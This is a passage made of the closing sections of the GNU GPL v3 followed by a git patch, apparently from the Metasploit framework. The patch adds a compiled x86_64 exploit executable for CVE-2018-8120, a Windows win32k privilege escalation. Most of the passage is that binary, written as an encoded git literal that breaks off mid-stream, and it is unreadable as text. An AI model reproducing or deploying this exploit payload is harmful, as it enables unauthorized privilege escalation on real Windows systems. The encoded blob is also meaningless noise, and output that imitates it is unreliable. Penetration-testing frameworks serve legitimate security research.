PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. From a67122aaf7ebfe057481ca56bf9a2941a2fb7381 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 11 Oct 2018 12:37:51 -0500 Subject: [PATCH 32/39] updated doc, added x86_64 binary --- .../CVE-2018-8120/CVE-2018-8120x86_64.exe | Bin 0 -> 83456 bytes .../windows/local/ms18_8120_win32k_privesc.md | 10 +++++----- .../windows/local/ms18_8120_win32k_privesc.rb | 6 +++++- 3 files changed, 10 insertions(+), 6 deletions(-) create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe new file mode 100755 index 0000000000000000000000000000000000000000..e39c4c076fcd935f4cd2c26187f922233f8e2d44 GIT binary patch literal 83456 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%0A9{4@A- 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 